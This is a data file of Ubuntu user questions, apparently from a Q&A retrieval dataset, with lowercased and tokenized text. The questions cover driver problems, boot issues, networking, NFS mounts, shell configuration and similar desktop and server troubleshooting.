296246	read-only nfs share not updating	i have a large storage device with about 6 different shares all mounted to a server running ubuntu 12.04 . the storage device takes regular checkpoints each day . i have the shares mounted as read-only because all i 'm doing is backing up the checkpoints to a second device . each day the storage device creates a checkpoint and deletes the one from two days ago . however i am not seeing this in the mounted directory on my server . todays checkpoint is not there , and the one the was deleted either says : no such file or directory or sometimes : stale nfs file handle sometimes if i umount and remount the checkpoints show up correctly , and sometimes they show up on there own . and sometime they will be several days behind . i 'm not really sure where the problem lies ( the server or the storage device ) . could the problem be that the shares are mounted as read-only ? i want to keep them as read only to avoid writing to them accidentally . the storage device a emc unisphere vnxe that i do n't know a whole lot about .
296248	install gf119m [ quadro nvs 4200m ] ( rev a1 ) drivers correctly	i have a hybrid laptop lenovo t420 . i have disabled optimus in bios and i 'm only using discrete graphic ( nvidia ) now . my nvidia gfx worked before i upgraded to ubuntu 13.04 , but now the driver wont load . i tried reinstalling the 'nvidia-current ' driver with : sudo apt-get remove -- purge nvidia-* sudo apt-get install nvidia-current nvidia-settings $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation gf119m [ quadro nvs 4200m ] ( rev a1 ) $ uname -a linux laptop 3.8.0-21-generic # 32-ubuntu smp tue may 14 22:16:46 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ lsmod | grep -i nvidia $ any clue on how to move on with this ?
296249	ubuntu as the only option on the boot menu	so i decided to upgrade my hard drive from a 750 gb hard drive to a brand new 1 tb hard drive . i installed ubuntu 12.10 with no errors and then updated it to 13.04 . then i attempted to install windows 7 but when i went into the boot options the usual ... hdd cd drive network ... was gone . instead it was only ... .. ubuntu ... nothing else *if this helps laptop specs i7 intel速 core i7-3520m intel hd 4000 and nvidia 620m
296251	inspiron 15r special edition + ubuntu	i would like to buy an inspiron 15r special edition , for using ubuntu . does anyone have this laptop with ubuntu ? is it is working 100 % ; or are there any problems ?
296252	how do i remove .deb files of uninstalled packages from the apt cache ?	i am an ubuntu newbie . i have just installed ubuntu 13.04 64-bit on my machine . and from the very start i like the experience ubuntu is giving me . i have learned some basic tasks like installing and downloading packages from the terminal using the apt-get command . i also learned that the downloaded packages can be backed up from the apt cache folder . there are times i 'm not connected to the internet so i want to make backups of my installed and downloaded packages ( from apt cache ) just in case i screw up my machine . because i 'm still a beginner , i got to install some software packages to try out -- like which music player will suite my taste . so therefore , after i made my pick i just remove the rest using apt-get remove from the terminal . i observed that even if i removed a software using apt-get remove command , the installer files are still present in the apt cache folder and its dependencies ( whether orphaned or not ) . as i mentioned before , not all times i 'm connected to the internet -- so i need to make a backup of all the packages i installed on my machine since installation ( including updates ) for future use . but i want to make the most of my disk . i do n't want removed packages ( its .deb files ) to be included in the cache for backup . how do i get around with this situation ?
296256	how do i add a user to sudoers file ?	how to i add my username to the sudoers file ? on my ubuntu desktop , the sudoer file has only root . so basically , i will just need to adduser to sudo file system . and i need to access to single user mode . i know the easiest way to to just select recovery mode in grub by hold down left shift when booting . then drop to root shell prompt . but it is ready-only file system . i need to write myself to the file . i know i have to select remount first , but where is it ? and any other way to add myself to sudo ?
296260	when $ shell variable does not change when i switch shell	i am using 'zsh ' by default . but when i am in my zsh shell , i enter 'bash ' to switch to bash , why the $ shell variable does not change ? can i make screen to use whatever shell i right before execute the 'screen ' command ? zsh % screen < the shell is zsh > zsh % bash bash $ screen < the shell is still bash , can i make screen to automatically start bash here >
296266	backlight ca n't be adjusted 13.04	in ubuntu 12.04 i was able to change the brightness of my laptop screen by using the fn + rightarrow all i had to do for that was include grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor pcie_aspm=force '' in /etc/defaults/grub however this does not work anymore now . i do not know where to look any further ( 2h of googling have n't brought up anything yet ... ) can you help ?
296267	major graphical problems after updating to 13.04	this afternoon i updated from 12.10 to 13.04 . ubuntu 12.10 worked entirely fine . however , when i now try to start ubuntu 13.04 , my graphics go completely wrong . and when i mean wrong , i mean really totally wrong : i get to see the ubuntu splash screen , but whenever it should get to the login screen i get white noise . if i boot in recovery mode , and then hit `` resume '' , it does n't change anything ; still the unworkable white noise . i can get something sort of workable by booting up an older version of the kernel . whereas version 3.8.0 gives me the white noise , kernel version 3.2.40 allows me to login normally . however , even there , the unity and top bars covered in some kind of noise . see the image for a screenshot . and if i click the dash button , my screen goes totally berzerk again . someone somewhere suggested installing fglrx-updates ( as i am using an ati mobility radeon hd 4530/4570/545v card ) , but this only aggravated the problem ; tiling windows no longer worked and the unity bar disappeared alltogether . this led me to believe it is somehwere related to my graphics card/driver . i tried to uninstall everything fglrx-related , by following the instructions here and here . this reverted my situation back to the one as seen in the image - sort of workable , but very very ugly - and still only in the older kernel version . i then tried installing the gnome shell , but this also had quite some graphical errors . if i go to software & sources , i get no suggestions for proprietary drivers at all . something is wrong with my graphics card/driver , but i do n't know what : - ( . if someone could point me in the right direction as how to fix this , thanks a lot !
296269	problems with installing aircrack-ng on ubuntu 12.04	i have found a tutorial on how to install aircrack-ng on ubuntu 12.04 because it 's not in the repositories anymore . i followed these instructions : sudo apt-get install build-essential libssl-dev wget http : //download.aircrack-ng.org/aircrack-ng-1.1.tar.gz tar -xzvf aircrack-ng-1.1.tar.gz cd aircrack-ng-1.1 nano common.mak i found this : cflags ? = -g -w -wall -werror -o3 and removed it with this : cflags ? = -g -w -wall -o3 after that i scrolled to the bottom and typed make and nothing happened . i tried sudo make install but nothing happened as well . is this normal ?
296271	ubuntu 13.04 : ca n't connect to many sites ( including github ) in firefox and chrome	[ i have posted the same issue on ubuntu forums : http : //ubuntuforums.org/showthread.php ? t=2145713 . i am repeating it here to see if i can find an answer here . ] i installed ubuntu 13.04 recently , and found that i ca n't connect to many sites , including github , using firefox ( 21.0 ) and chrome ( 26.0.1410.63 ) . i can visit all these sites on windows , in all browsers . firefox continues to load the site , but does n't show any contents . chrome gives an error after a while : error 7 ( net : :err_timed_out ) : the operation timed out . some websites are loaded partially . some other sites with this issue : bitbucket ( works on chrome but not in firefox ) , yahoo mail , 500px ( partially loaded ) , images served from pcdn.500px.com are not loaded . i also ca n't clone ( git clone ) github repositories : i get `` error : operation timed out '' . i can clone bitbucket repos . in addition i noticed the following `` ssl '' issue while using `` pip '' to install python packages ; the packages do get installed . i am including this in here in case it is related to the above issue : $ pip install ipython downloading/unpacking ipython could not fetch url https : //github.com/ipython/ipython/downloads ( from https : //pypi.python.org/simple/ipython/ ) : there was a problem confirming the ssl certificate : < urlopen error _ssl.c:489 : the handshake operation timed out > will skip url https : //github.com/ipython/ipython/downloads when looking for download links for ipython downloading ipython-0.13.2.tar.gz ( 6.0mb ) : 6.0mb downloaded running setup.py egg_info for package ipython installing collected packages : ipython running setup.py install for ipython installing ipcontroller script to /home/phn/.virtualenvs/default2.7/bin installing iptest script to /home/phn/.virtualenvs/default2.7/bin installing ipcluster script to /home/phn/.virtualenvs/default2.7/bin installing ipython script to /home/phn/.virtualenvs/default2.7/bin installing pycolor script to /home/phn/.virtualenvs/default2.7/bin installing iplogger script to /home/phn/.virtualenvs/default2.7/bin installing irunner script to /home/phn/.virtualenvs/default2.7/bin installing ipengine script to /home/phn/.virtualenvs/default2.7/bin successfully installed ipython cleaning up ... note that i have none of these issues in windows . [ edit : may 17 2013 ] output from running curl on github : [ phn @ phn ~ ] $ curl -i http : //github.com http/1.1 301 moved permanently server : github.com date : fri , 17 may 2013 03:33:08 gmt content-type : text/html content-length : 178 connection : close location : https : //github.com/ vary : accept-encoding [ phn @ phn ~ ] $ curl -i https : //github.com curl : ( 35 ) unknown ssl protocol error in connection to github.com:443 i hope someone can help me fix this . thanks , prasanth
296272	ca n't install ubuntu on windows 8	: ) so i 'm trying to install ubuntu ... but it wo n't install . currently i 'm using windows 8 and i have 2 hdd . on 1 hdd i 've installed windows 8 and using it , primary partition , but the other hdd is empty so i 'm trying to install ubuntu on it . so what i 've tried is : downloaded 32 bit of 12.04 lts and used wubi but it wo n't boot at all . burned it on cd but when i boot it and click install ubuntu it just hangs on there and stops responding . downloaded 64 bit over wubi downloader and it installed and when i boot windows 8 i have selection of windows and ubuntu . i click ubuntu and when i do it it just boots something and then i get `` scratched '' screen of windows , i 've had this error before so i just put on nomodeset in .cfg but then it gave me about 50 errors instead of the `` scratched '' screen . i 'm currently out of ideas , i 'll give my pc specs below . motherboard : http : //www.asrock.com/mb/overview.asp ? model=4coredual-sata2 graphic card : nvidia 8600 gt cpu : intel dual core 1.6 ghz 2140 ram : 2 gb
296273	increase root size , shrink /home size , on console	i have a debian system which has been set up quite a long time ago with default partition sizes as suggested by the installer . turns out that the root and /usr partitions are too small for my needs . for instance , i do n't have enough space to install a new kernel . disk layout is as follows : # df|grep sdb /dev/sdb1 264445 235155 15637 94 % / /dev/sdb9 472007120 292643816 155386696 66 % /home /dev/sdb8 381138 27042 334418 8 % /tmp /dev/sdb5 4806904 4276636 286084 94 % /usr /dev/sdb6 2885780 845500 1893692 31 % /var # fdisk -l /dev/sdb disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c26ca device boot start end blocks id system /dev/sdb1 * 1 34 273073+ 83 linux /dev/sdb2 35 60801 488110927+ 5 extended /dev/sdb5 35 642 4883728+ 83 linux /dev/sdb6 643 1007 2931831 83 linux /dev/sdb7 1008 1053 369463+ 82 linux swap / solaris /dev/sdb8 1054 1102 393561 83 linux /dev/sdb9 1103 60801 479532186 83 linux i would like to shrink the /home partion ( which is located at the `` end '' of the disk ) by cutting about 10 gb from the beginning and then giving 5 gb each to the root partition and /usr . this would mean to move /dev/sdb [ 2-8 ] to make room for the additional space for root and /usr . the system is console-only . is there a way to do these changes without loosing data on root , /usr , /var and /home ?
296274	can not access my ubuntu server on my local network , can remotely	my ubuntu web server was working fine yesterday , but i tried to login via ssh today and it would not connect . i also can not view my website by typing in the local ip address and i get no response from a ping . i can do all of these things using my external ip . any thoughts as to why ?
296281	fn keys not working in microsoft ergonomic keyboard behind kvm switch	i have recently acquired an encore usb kvm switch to handle both my desktop and laptop computers . both computers are dual boots ( ubuntu 12.04/windows 7 and ubuntu 12.10/windows 8 ) . i have connected to the kvm usb ports my microsoft natural ergonomics 4000 keyboard and my microsoft wireless mouse 5000 mouse . the mouse works ok and for the most part the keyboard works too , except that all of the advanced keys ( multimedia , home , mail , etc . ) and , more important , the fn keys , do n't work . they do work if i connect my keyboard directly to any of the independent pcs . this issue of non working keys also happens if i boot the pc 's in windows . not having the fn keys is a deal breaker for me : - ( any solution for this ?
296282	dvd-r vs dvd+r for livecd	for the past year and a half or so , i have been using ubuntu as a secondary os , running it off of a portable hdd . within the past 2 weeks , my portable hdd has started to show worrying signs of imminent disk-death . i have a replacement drive , but i need to copy over the entirety of the first hdd to the second . in order to get access to the tools i would need ( dd will make a 100 % complete bit-for-bit copy of a multi-partition drive to a new drive , correct ? ) , i 'm going to have to run a livecd of linux . i 've been trying to figure out if i should be using a dvd-r or a dvd+r for the livecd . is there any noticeable difference as far as a ubuntu livecd goes , between the two standards ?
296288	cinnamon menu panel in wrong position	i 'm using cinnamon on ubuntu 13.04 . i undocked my laptop ( thinkpad t420 ) and replaced it . the panel menu is a bit off . any idea how to correct this ? ( click to enlarge )
296294	alt-tab crashes gnome classic desktop ( 12.04 )	i have a fresh install of ubuntu 12.04 and noticed alt-tab was n't working . i followed some advice and installed compizconfig settings manager , wherein i checked application switcher . then alt-tab worked , but sometimes ( lately , every time ) it crashes the desktop . i 'm using gnome classic ( which by the way i have not been able to set as the default ... i have to select it every time ) . after hitting alt-tab , the screen freezes , and the mouse can be moved only briefly every few seconds , and clicking anywhere does n't seem to do anything . some parts of the screen become a bit distorted . one time it recovered , but then crashed again as soon as i clicked on the time in the upper-right corner . any idea how to fix this ? where can i look in the log files ? perhaps i can uninstall compizconfig ( after all , it does come with a warning that it can wreck your system ) but then how can i get alt-tab to work ? many thanks . edit : i guess not many people have had this issue . i suspect it 's a problem with my graphics card - perhaps it does n't like the fancy effect involved with alt-tab window-switching . so a revision to my question would be : how do i enable alt-tab to switch windows for me in the simplest , safest , non-fancy way ? can i do it without compizconfig ?
296299	masquerading does n't work between ubuntu and windows server	me and 2 other computer science students are working together on a school project . one of our goals is to connect windows server 2008 to the internet through ubuntu . everything is virtual using virtualbox . after hours of searching , we somehow know how to do it , but we ca n't make it work ! this is what we have done right now : we 've made an internal network . the server and ubuntu can ping to each other ! ubuntu has the following ip settings : eth0 link encap : ethernet hwaddr 08:00:27:56 : d2 : ec inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe56 : d2ec/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:132 errors:0 dropped:0 overruns:0 frame:0 tx packets:211 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:77439 ( 77.4 kb ) tx bytes:25583 ( 25.5 kb ) eth1 link encap : ethernet hwaddr 08:00:27 : e4 : d2 : ac inet addr:192.168.5.1 bcast:192.168.5.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fee4 : d2ac/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:102 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:60 ( 60.0 b ) tx bytes:15301 ( 15.3 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:37 errors:0 dropped:0 overruns:0 frame:0 tx packets:37 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3396 ( 3.3 kb ) tx bytes:3396 ( 3.3 kb ) the windows server has 3 connection , the one that is connected to ubuntu and 2 other that have been made by windows . windows ip configuration host name . . . . . . . . . . . . : winservervirt primary dns suffix . . . . . . . : node type . . . . . . . . . . . . : hybrid ip routing enabled . . . . . . . . : no wins proxy enabled . . . . . . . . : no ethernet adapter local area connection 2 : connection-specific dns suffix . : description . . . . . . . . . . . : intel ( r ) pro/1000 mt desktop adapter # 2 physical address . . . . . . . . . : 08-00-27-fe-a7-8b dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes ipv4 address . . . . . . . . . . . : 192.168.5.2 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 default gateway . . . . . . . . . : 192.168.5.1 dns servers . . . . . . . . . . . : 172.21.1.72 8.8.8.8 netbios over tcpip . . . . . . . . : enabled tunnel adapter isatap . { 08b9df15-6a0b-43a0-9a18-81b531c9e4fc } : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : description . . . . . . . . . . . : microsoft isatap adapter physical address . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes tunnel adapter teredo tunneling pseudo-interface : media state . . . . . . . . . . . : media disconnected connection-specific dns suffix . : description . . . . . . . . . . . : teredo tunneling pseudo-interface physical address . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . . : no autoconfiguration enabled . . . . : yes we 've set up iptables in ubuntu and made the following iptables-save : [ # ] generated by iptables-save v1.4.12 on mon may 13 10:37:49 2013 *filter : input accept [ 2113:2711614 ] : forward accept [ 20:1420 ] : output accept [ 376:41476 ] -a input -p tcp -m tcp -- dport 80 -j accept -a input -s 192.168.5.2/32 -j accept -a forward -s 192.168.0.0/24 -i eth1 -o eth0 -m conntrack -- ctstate new -j acce $ -a forward -m conntrack -- ctstate related , established -j accept -a output -s 192.168.5.2/32 -j accept commit [ # ] completed on mon may 13 10:37:49 2013 so , as you might see , i can connect to the internet with ubuntu , but windows server does n't do anything ! firewall is turned off and there 's no antivirus . can you get us setting this up ? thanks in advance !
296300	the arrow , page up and down keys cause screenshots	every time i attempt to scroll through web pages with the arrow keys or insert , home , end , page up or down ... . my computer snaps a screenshot . is there a system setting or fix to this issue ?
296302	why did uninstalling wubi not free disk space while virtual hard disk was 15gb ?	we recently uninstalled wubi from a windows vista computer by selecting ubuntu in control panel and clicking the uninstall button . the uninstaller ran suspiciously fast ( it was done in a few seconds while wubi 's virtual hard disk was something like 15gb large ) , and after checking disk usage , no disk space was freed despite c : \ubuntu is n't there anymore . why did uninstalling it not free any disk space and how can i get my disk space back ?
296305	ubuntu 12.04 install screen does n't appear on fujitsu v6555	i have a fujitsu v6555 with enough specs to run ubuntu 12.04 lts , which is currently running windows 7 . when i put the ubuntu live dvd ( ubuntu-12.04-desktop-i386.iso ) , it starts booting then shows the background and mouse cursor and freezes ! no installation screen showing further , it just stays a background with a mouse cursor . i searched relevant asked questions here and tried pressing f6 at the boot menu and checking the ( acpi = off ) but the result went worse , when i clicked try ubuntu , a black screen with underscore flashing at upper left corner appeared . i found another similar question : install screen does n't show on ubuntu livecd/liveusb i did n't understand what is the ubuntu alternative cd ? and what is the network installer . it 's just a link with files and folders . it got me lost . please help i want ubuntu so much !
296307	how to upgrade 12.04.2 kernel and hwe to raring ?	as the topic states i want to upgrade my 12.04.2 to newest raring lts kernel and hwe . now i have : distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise linux nas 3.5.0-28-generic # 48~precise1-ubuntu smp wed apr 24 21:42:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux some history : originally installed 12.04.1 lts , then upgraded to 12.04.2 , and some time ago i 've upgraded kernel and hwe to quantal by installing : linux-generic-lts-quantal and xserver-xorg-lts-quantal now i 'd like to the same but to raring . and there lies the problem , as linux-generic-lts-raring exists but xserver-xorg-lts-raring does not . did the procedure change , or i 'll have to wait a bit for xserver to show up in the repos ?
296317	how do i install a bazaar fork in 13.10 ?	i found a bazaar fork promising a solution to one of my issues here : bluetooth indicator disappears on turning off bluetooth problem is , i followed their instructions , and all it did was download the code to a local folder in my $ user home . where do i go on from here ? how do i install the code so that i can start getting the benefits promised by the solution ?
296321	blank screen after software update on ubuntu 13.04	i installed ubuntu 13.04 just after it 's release . it was going fine untill an update of some kind screwed it up . after software update my desktop panel and launcher disappeared , i 'm staring at a blank screen and can use the machine with just terminal commands . this is my third clean install . i ca n't seem to get the launcher working . it 's not about video drivers , i 'm using proprietary drivers , open source one causes black screen and fglrx gives me unsupported hardware watermark . and of course it was working thus far . catalyst version is 13.4 i repaired broken packages and tried to get in with failsafe graphics mode , no luck . what can i do to fix this ? my system specifications : amd fx-8350 asus crosshair v formula amd radeon hd6950 8 gb ram 1600 mhz
296322	misbehaving of stylus based notetaking programs ( xournal , jarnal ) after installing ubuntu 12.10 in surface pro	recently i installed ubuntu 12.10 in my surface pro , and everything works just fine out of the box . but note-taking programs like xournal , jarnal are misbehaving in a bad way . in xournal , suddenly the screen gets filled with straight lines that i did not draw . in jarnal , it is even worse , the stylus draws all sorts of crazy curves while hovering over the screen ( yes , the stylus does not even need to touch the screen ! ) . what is strange is that when i installed ubuntu 12.10 in virtualbox ( windows 8 host ) , they worked perfectly . i will appreciate very much if anyone could give some suggestion on how to resolve this .
296324	gnome problem in ubuntu 13.04	i installed gnome 3.8 in ubuntu 13.04 , and the ui in unity also changed . and i kept getting messages that there was an error in my system and the error has to be reported . this actually started after installing gnome . and when i was browsing , i faced problems with loading of images in facebook , etc . this all happened only after installing gnome . and when i tried uninstalling it using apt-get purge gnome-shell-* , gnome desktop environment got removed , but the problem of image loading still exists and the skin of unity is not as it was before . can anyone help me ?
296325	ubuntu 13.04 only detects one of my processors	processor : 0 vendor_id : authenticamd cpu family : 18 model : 1 model name : amd a6-3670 apu with radeon ( tm ) hd graphics stepping : 0 microcode : 0x3000027 cpu mhz : 2781.169 cache size : 1024 kb physical id : 0 siblings : 1 core id : 0 cpu cores : 1 apicid : 0 initial apicid : 0 fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc nonstop_tsc aperfmperf pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs kinit wdt arat hw_pstate npt lbrv svm_lock nrip_save pausefilter bogomips : 5562.33 clflush size : 64 cache_alignment : 64 address sizes : 40 bits physical , 48 bits virtual power management : ts ttp tm stc 100mhzsteps hwpstate i dont understand how to fix this : ( please help if possible
296330	ubuntu 13.04 on lenovo g580 > built-in ( web ) cam not recognized	i 've installed ubuntu 13.04 on a lenovo g580 . now i noticed that the built-in ( web ) cam is not being recognized . does anybody know how to fix this and get the webcam running ? any help is appreciated ! thanks i 've downloaded/installed the suggested program and the webcam is working within that program . however , when running camera test from the system testing here 's what happens : when clicking on `` test '' , there 's no image showing up a few seconds after clicking on `` test '' , an error message is popping up saying `` sorry , ubuntu 13.04 has experienced an internal error '' when going to skype , video is enable and under `` select webcam '' there 's `` lenovo easycamera ( /dev/video0 ) as only option selected . but , skype does n't recognize the camera as there 's no pictures . any ideas on how to get this straightened out ?
296331	how to mount a hard disk as read-only from the terminal	i have searched google , i 've searched this website , i 've searched using various terms , phrases , using quotes and without quotes and i can not find the answer to this seemingly easy thing to do . how do you mount a hard disk from the command line as read-only ? i do n't want or need a link to the man page , i want the exact thing i will have to type in if the following is true : disk to mount is on /dev/sda it is 2 tb -it is critical that i mount it read-only and not read-write . very critical . i 'm doing it from a live ubuntu cd so i have no business to edit the fstab or any file for that matter
296333	ubuntu start error	i have a 64-bit ubuntu 12.10 , which at start up displays an error . i click on `` send report '' , but it always fails , displaying : failed to run /usr/share/apport/apport-gtk as user root . the underlying authorisation mechanism ( sudo ) does not allow you to run this program . contact the system administrator . can you tell me how to fix this error ? thanks !
296337	automount ntfs drives before startup applications	before i start , i just what to point out that i know how to automount an ntfs drive . my problem is that my dropbox folder is on one of the ntfs drivers that i automounted ... when ubuntu starts up , it loads the dropbox application before it mounts the ntfs drive which results in an error `` dropbox folder not found '' ! so how can i automount the parition before all startup applications ? ( i am using ubuntu 13.04 ) ps . i am not planning on moving my dropbox folder to my user folder , i would like to leave it on the ntfs partition ..
296340	ca n't login to vps with newly created account via ssh	recently i 've bought a vps server . i decided to install ubuntu on it . i want to set up a git server on it but i have problem . i 've read i should create new account for this purpose . i 've already done it but i ca n't login to it via : ssh git @ ip.adres.here . it displays an error message : permissions denied , please try again . any advice ? i 'm new to linux so please try to explain it as easy as you can .
296348	glitch in video taken by gtk-recordmydesktop	using gtk-recordmydesktop , i took this video that does n't have any issue at its beginning ( here i 'm only focusing on a few seconds from the point both links start at ) . gtk-recordmydesktop yields .ogv and i converted it into mp4 command like : handbrakecli -f mp4 -i ./original.ogv -o ./converted.mp4 however , in another video that incorporates the video above as a result of editing , there starts to appear a glitch , which looks like a window at the back ground on the desktop of the computer at that time . question-1 . is there a way to avoid this kind of glitch happens with the video file that 's already recorded ? question-2 . if the answer in q-1 is no , are there things to avoid this to happen when i 'm recording video snapshot ? since i 've found gtk-recordmydesktop works the best for me i prefer to sticking to it , but i also welcome other tools if any for this purpose . this thread seems to be discussing similar issue but no solution/workaround is reached . using ubuntu quantal , handbrake-cli 0.9.8ppa1~precise1 , gtk-recordmydesktop 0.3.8-4.1ubuntu1
296355	in xubuntu , should i always install everything in the update manager ?	i have been running xubuntu 12.10 for over a month now , on 5 machines ( old compaq evos , runs nice and slim on these old chips ) . i immediately became afraid of installing the updates suggested in the update manager when an update session in one machine disabled the wireless card i had worked so hard to get working ( one of those pesky ones that refuses to play nice with linux ) . i later noticed that some updates in the update manager do n't seem to apply to me , such as a `` unity toolbar update '' . i installed this version of ubuntu cleanly as xubuntu so i do n't use unity . to summarize my question : should i always install everything that comes up in the update manager in xubuntu or would it be better to skip updates that i think should not apply to my machine ? thanks in advance .
296356	what is this strange spontaneous facebook/google chrome popup ?	recently my ubuntu 12.10 system has started the following strange behavior : a google chrome window will pop up , trying to load this url : http : //www.facebook.com/login.php ? skip_api_login=1 & api_key=302061903208115 & signed_next=1 & next=https % 3a % 2f % 2fwww.facebook.com % 2fdialog % 2foauth % 3fredirect_uri % 3dhttps % 253a % 252f % 252fwww.facebook.com % 252fconnect % 252flogin_success.html % 26display % 3dpopup % 26scope % 3dpublish_stream % 252cread_stream % 252cstatus_update % 252cuser_photos % 252cfriends_photos % 252cxmpp_login % 26type % 3duser_agent % 26client_id % 3d302061903208115 % 26ret % 3dlogin & cancel_uri=https % 3a % 2f % 2fwww.facebook.com % 2fconnect % 2flogin_success.html % 3ferror % 3daccess_denied % 26error_code % 3d200 % 26error_description % 3dpermissions % 2berror % 26error_reason % 3duser_denied % 23_ % 3d_ & display=popup this will result in a page that says : success security warning : please treat the url above as you would your password and do not share it with anyone . with url : = '' > https : //www.facebook.com/connect/blank.html # = ( despite that warning , i do n't seen anything confidential in the url . ) what i find very strange about this is that it will pop up a few minutes after i boot my system , before i even start chrome . is this some kind of malware , or what ? edit : after deleting the `` ubuntu app '' from facebook ( ! ) , the popups still occur , but now they bring up a message saying `` ubuntu would like to access your public profile , friend list , news feed , photos and your friends ' photos . ''
296361	open .vym files with view your mind	how can i open .vym files with view your mind ? it is not listening in the open with dialog .
296366	screen backlight is disabled after installing nvidia geforce 9600m gt drivers	since several weeks ago , i am in the quest for try to fix the back-light control on my sony vgn-aw220j with nvidia geforce 9600m gt , but until date no luck after try so many recipes and fixes from many places around the net . the trouble is that the backlight have no control and always the level is 100 % with a great energy waste and great eye hurt and fear for may cause harm too . i tried nvidia-bl-dkms and many other ways . ... .actually no luck at all . please help ...
296368	can i download the new version and burn it to a cd and install it without reformating the hard drive ?	i was upgrading from version 11 to version 12 and during the upgrade it stopped processing giving a message of `` stopped processing due to too many errors '' . now the operating system is corrupt and does not function , no cursor , no control at all . can i download the new version and burn it to a cd and install it without reformating the hard drive ?
296370	ubuntu 13.04 stuck on shutdown due to bbswitch	i had this problem long ago , but it 's the first time it 's caused , i think , by bbswitch . first the ubuntu logo is shown , then i get this : ( the last thing written there is bbswitch : enabling discrete graphics ) ps . i can hear the fan and the hard drive turning off , but the screen stays the same and the laptop still quit hot . thanks for you help .
296373	how can i get the nvidia driver to drive my projector at 1280x720 ?	i recently purchased a benq w600+ projector that i 'd like to use with my thinkpad t410 with nvidia graphics running ubuntu 12.10 . the native resolution of the projector is 1280x720 ( i.e . 720p ) , but i have n't been able to configure the nvidia driver to actually use this resolution . the projector is connected to the vga port . the driver is nvidia-current ( i think ) . here are the resolutions offered by the `` displays '' system settings . note that 1280x720 is not listed : i followed the directions under `` adding undetected resolutions '' at wiki.ubuntu.com , but they lead to an error : xrandr -- newmode `` 1280x720 '' x0.0 74.25 1280 1390 1430 1650 720 725 730 750 -hsync -vsync xrandr -- addmode vga-0 1280x720x0.0 here 's the error message from the second xrandr command : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 39 current serial number in output stream : 40 i also see this error message in /var/log/xorg.0.log : [ 2284.687 ] ( ww ) nvidia ( gpu-0 ) : unable to read edid for display device crt-0 [ 2284.687 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 2284.687 ] ( ** ) nvidia ( 0 ) : device crt-0 ( using edid frequencies has been enabled on [ 2284.687 ] ( ** ) nvidia ( 0 ) : all display devices . ) i have another machine , a thinkpad t510 , with intel graphics and running an earlier release of ubuntu . on that machine the projector works fine , and the following appears in the xorg logfile : ( ii ) intel ( 0 ) : edid vendor `` bnq '' , prod id 52737 ( ii ) intel ( 0 ) : using hsync ranges from config file ( ii ) intel ( 0 ) : using vrefresh ranges from config file ( ii ) intel ( 0 ) : printing ddc gathered modelines : ( ii ) intel ( 0 ) : modeline `` 1280x720 '' x0.0 74.25 1280 1390 1430 1650 720 725 730 750 -hsync -vsync ( 45.0 khz ) the nvidia-settings program is similarly unhelpful . the `` acquire edid '' option is grayed out : and it also does n't offer the 1280x720 resolution : i do n't have any /etc/x11/xorg.conf file . i did try running nvidia-xconfig to create an xorg.conf file , but that seemed to make everything much worse : the projector came up only in 640x480 , and the mouse cursor would get `` stuck '' on one of the displays . when x starts with this xorg.conf file , i also get this error message popup box : how can i get the projector to work at 1280x720 on my t410 ?
296376	startup disk creator always crash at the end of process	without persistent storage , it will crash when creating boot loader , couple of seconds after i input my password , and with persistent storage , it always crash at 99 % , no matter how much space for persistent storage defined . how to solve this ? same result for 12.10 and 13.04 .
296377	how do i change the default shell used in byobu ( tmux ) ?	i 've become addicted to byobu and i 've recently shifted from bash to zsh ; now i want to combine the two , however i have a one initial pre-requisite : i can not make zsh the default shell for my user as it 's a shared account and the rest of the team are n't as zsh happy as i am - that rules out the 'chsh -s /bin/zsh ' option . so , i discovered you can set a default-shell for tmux ( which should follow across to byobu right ? ) . that would be perfect as i 'm also the only one really using byobu on the server . problem is , i ca n't work out where to enable this option in the confusion of config files that 's created in the tmux/byobu mix . any hints ?
296385	backspace in insert mode in vi does n't erase the character	i am new to vi , actually i have started learning vi from today and i have got stuck at the behavior of the backspace key . actually when i fired up vi on my ubuntu 12.04 for the first time my backspace key was working normally but after that it has started behaving strangely . whenever i press the backspace in the insert mode it just moves one place to the left instead of erasing the character . how can i get back the default backspace functionality ? please note that i do n't want to install vim or set nocompatibilty .
